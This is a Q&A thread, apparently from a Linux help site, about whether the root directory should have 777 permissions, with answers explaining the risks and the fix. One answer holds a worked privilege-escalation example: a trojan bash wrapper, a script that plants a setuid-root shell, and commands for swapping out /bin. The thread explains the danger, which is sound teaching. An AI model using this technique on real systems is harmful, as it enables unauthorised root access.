# Should the root / have 777 permission?

Tags: permissions, security, directory

Most of the contents is 755 though.

Is this a problem?

Comment: Can you please edit your question and title to clarify what you are asking. Is it ufw that is complaining about 755 permissions, or are you asking if the root should have 777 permissions?

Comment: The actual question has never been anything other than what it is now. The additional details have all now been removed as they have caused confusion as to what was being asked.

Comment: Ah, OK.  Let me modify again.

Answer (score 12, accepted):

That is interesting that the `/` actually allows `777` permissions to be set on it.  The `/` folder should not have `777` permissions, as this means that any user logged into the system can create files and folders at the `/` root level.  I have tested this in a VM and you **CANNOT** delete any of the folders or files that are not `777` without being `sudo`, `root` or the `owner`.  The access permissions are still followed, like trying to access the `/root` folder itself would give you permission denied. However, that being said, you could still move the `/root` folder to `/root.old` creating little havoc.

To fix this you can run `sudo chmod 755 /` to change permissions to what they should be.  You can also run `sudo chown root:root /` just to make sure that it is owned by root itself.  **DO NOT run any of those commands with -R as this will change all files and folders in the partition to match permissions and ownership.**

Hope this helps!

Comment: Wow..`That should not be a problem`..why?

Comment: @Terrance Ok..cool..i have downvoted your answer for now..once OP will clarify the missing bits i will remove my downvote and give an upvote happily :) The question (as it stands now) has the heading `Should the root / have 777 permission?` and the first line of your answer is `That should not be a problem` ..please knock me when its fixed..

Comment: @heemayl I will do that.  =)

Comment: @K.Eoe It is all good now.   I am going to remove all my comments from here as they are now moot.

Comment: @heemayl I fixed it, and I had a big misunderstanding with what he was asking as I was confused with the ufw and thinking that it was complaining about the 755 folders because I was part of the original question.  It is now fixed and I understand.  You can leave it or change it.  I am not mad either way.  My sincerest apologies my friend!  =)

Comment: Upvoted..... :)

Answer (score 8):

No.  It's not safe for `/` (the root directory) to have `777` permissions.  That means `rwxrwxrwx`, i.e., every user has write permission to the root directory.

With that permission, every user will be able to create new subdirectories, delete existing subdirectories, and replace existing subdirectories.  For instance, a malicious user could delete `/bin` (by renaming it to `/bin.old`) and create a new `/bin` owned by them, containing malicious executables.  Or the user could delete `/etc` (by renaming it to `/etc.old`) and create a new `/etc` containing a new `/etc/passwd` and `/etc/shadow` file that lets the user log in to every account on the system.

Comment: I misunderstood the question as the ufw was throwing me off.  My sincerest apologies.  +1 for a great answer.  =)

Comment: Wouldn't deleting `/bin` first need `/bin`'s contents to be removed -- which the user wouldn't have permissions for? Still, all sorts of other abuse would be possible, so this doesn't invalidate your main point.

Comment: @hvd, No: you can rename `/bin` to `/bin.old` without deleting its contents, then create `/bin`, then put your malicious executables in the new `/bin`.

Comment: @D.W. Exactly. In other words, other abuse would be possible, but deleting `/bin` wouldn't be possible. Which is what I pointed out.

Comment: @hvd, OK, I've edited the answer to make that clearer.

Answer (score 8):

## `/` should not be world-writeable

`/` being world-writeable can be a ***huge*** problem. Having write permissions on `/`, any user can move/rename any file or directory in `/`. This means that any user can replace `/etc`, `/usr` or any of the other directories in `/` with directories of their choosing.

### Denial of Service: Trivial

Any user can trivially DoS your system, by renaming `/etc` and `/usr`.

### Privilege Escalation: Slightly less trivial

It's slightly harder to perform privilege escalation. A user can replace `/bin` with their own copy, and any process which then tries to use `cp`, or even *start a shell*, will be immediately at their mercy. All the user need do is wait for a process running as root to use any command in `/bin`, or the root user to use login, and they're in.

#### Example

`bash.c`:

```c
#include<sys/types.h>
#include<unistd.h>

int main(int argc, char*argv[], char *env[])
{
    if (getuid() == 0) {
        system("/home/muru/foo");
    }
    execve("/bin/bash", argv, env); 
}
```

`foo`:

```bsh
#!/bin/sh

mv /bin /..bin
mv /.bin /bin
rm -rf /..bin
cp /bin/bash /home/muru
chown root:root /home/muru/bash
chmod u+s /home/muru/bash
```

And then:

```
$ gcc -o bash bash.c
$ mkdir /..bin
$ cd /bin; for i in /bin/*; do ln -s /..bin/"$i" /.bin/"$i"; done
$ mv /bin /.bin
$ mv /..bin /bin
$ cp bash /bin
```

And the next time root starts a shell, you get a setuid executable in your home directory which you can then comfortably use to gain root whenever you feel like it, without leaving much trace.

Comment: I like this!  +1 for you my friend!  =)

Comment: Shame that bash itself won't let itself run as setuid, so your setuid bash executable is now useless...

Comment: @Hitechcomputergeek Irrelevant. You can make anything setuid. Just pick another command, or write another wrapper.

Comment: @muru Sure it's irrelevant, I'm simply pointing out that your example doesn't actually work.